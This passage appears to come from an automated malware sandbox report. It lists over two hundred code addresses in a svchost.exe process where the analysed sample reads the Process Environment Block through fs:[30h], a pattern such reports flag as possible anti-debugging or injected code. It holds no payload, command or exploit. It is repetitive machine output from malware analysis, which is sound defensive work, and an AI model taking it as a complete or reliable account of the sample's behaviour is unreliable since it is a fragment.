                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_038061E5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037F0115 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037601F8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03770185 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0375C073 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03732050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B6050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6030 mov eax, dword ptr fs:[00000030h]2_2_037C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A020 mov eax, dword ptr fs:[00000030h]2_2_0372A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C020 mov eax, dword ptr fs:[00000030h]2_2_0372C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4000 mov ecx, dword ptr fs:[00000030h]2_2_037B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C0F0 mov eax, dword ptr fs:[00000030h]2_2_0372C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037720F0 mov ecx, dword ptr fs:[00000030h]2_2_037720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0372A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037380E9 mov eax, dword ptr fs:[00000030h]2_2_037380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B60E0 mov eax, dword ptr fs:[00000030h]2_2_037B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B20DE mov eax, dword ptr fs:[00000030h]2_2_037B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov eax, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov ecx, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037280A0 mov eax, dword ptr fs:[00000030h]2_2_037280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C80A8 mov eax, dword ptr fs:[00000030h]2_2_037C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373208A mov eax, dword ptr fs:[00000030h]2_2_0373208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738770 mov eax, dword ptr fs:[00000030h]2_2_03738770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730750 mov eax, dword ptr fs:[00000030h]2_2_03730750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE75D mov eax, dword ptr fs:[00000030h]2_2_037BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4755 mov eax, dword ptr fs:[00000030h]2_2_037B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov esi, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov ecx, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AC730 mov eax, dword ptr fs:[00000030h]2_2_037AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730710 mov eax, dword ptr fs:[00000030h]2_2_03730710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760710 mov eax, dword ptr fs:[00000030h]2_2_03760710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C700 mov eax, dword ptr fs:[00000030h]2_2_0376C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE7E1 mov eax, dword ptr fs:[00000030h]2_2_037BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C0 mov eax, dword ptr fs:[00000030h]2_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B07C3 mov eax, dword ptr fs:[00000030h]2_2_037B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037307AF mov eax, dword ptr fs:[00000030h]2_2_037307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E47A0 mov eax, dword ptr fs:[00000030h]2_2_037E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D678E mov eax, dword ptr fs:[00000030h]2_2_037D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03762674 mov eax, dword ptr fs:[00000030h]2_2_03762674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374C640 mov eax, dword ptr fs:[00000030h]2_2_0374C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E627 mov eax, dword ptr fs:[00000030h]2_2_0374E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03766620 mov eax, dword ptr fs:[00000030h]2_2_03766620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768620 mov eax, dword ptr fs:[00000030h]2_2_03768620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373262C mov eax, dword ptr fs:[00000030h]2_2_0373262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772619 mov eax, dword ptr fs:[00000030h]2_2_03772619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE609 mov eax, dword ptr fs:[00000030h]2_2_037AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov eax, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037666B0 mov eax, dword ptr fs:[00000030h]2_2_037666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C6A6 mov eax, dword ptr fs:[00000030h]2_2_0376C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6500 mov eax, dword ptr fs:[00000030h]2_2_037C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037325E0 mov eax, dword ptr fs:[00000030h]2_2_037325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037365D0 mov eax, dword ptr fs:[00000030h]2_2_037365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E59C mov eax, dword ptr fs:[00000030h]2_2_0376E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov eax, dword ptr fs:[00000030h]2_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov ecx, dword ptr fs:[00000030h]2_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764588 mov eax, dword ptr fs:[00000030h]2_2_03764588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC460 mov ecx, dword ptr fs:[00000030h]2_2_037BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA456 mov eax, dword ptr fs:[00000030h]2_2_037EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372645D mov eax, dword ptr fs:[00000030h]2_2_0372645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375245A mov eax, dword ptr fs:[00000030h]2_2_0375245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A430 mov eax, dword ptr fs:[00000030h]2_2_0376A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C427 mov eax, dword ptr fs:[00000030h]2_2_0372C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037304E5 mov ecx, dword ptr fs:[00000030h]2_2_037304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037644B0 mov ecx, dword ptr fs:[00000030h]2_2_037644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BA4B0 mov eax, dword ptr fs:[00000030h]2_2_037BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037364AB mov eax, dword ptr fs:[00000030h]2_2_037364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA49A mov eax, dword ptr fs:[00000030h]2_2_037EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CB7E mov eax, dword ptr fs:[00000030h]2_2_0372CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728B50 mov eax, dword ptr fs:[00000030h]2_2_03728B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEB50 mov eax, dword ptr fs:[00000030h]2_2_037DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]2_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]2_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB40 mov eax, dword ptr fs:[00000030h]2_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D8B42 mov eax, dword ptr fs:[00000030h]2_2_037D8B42
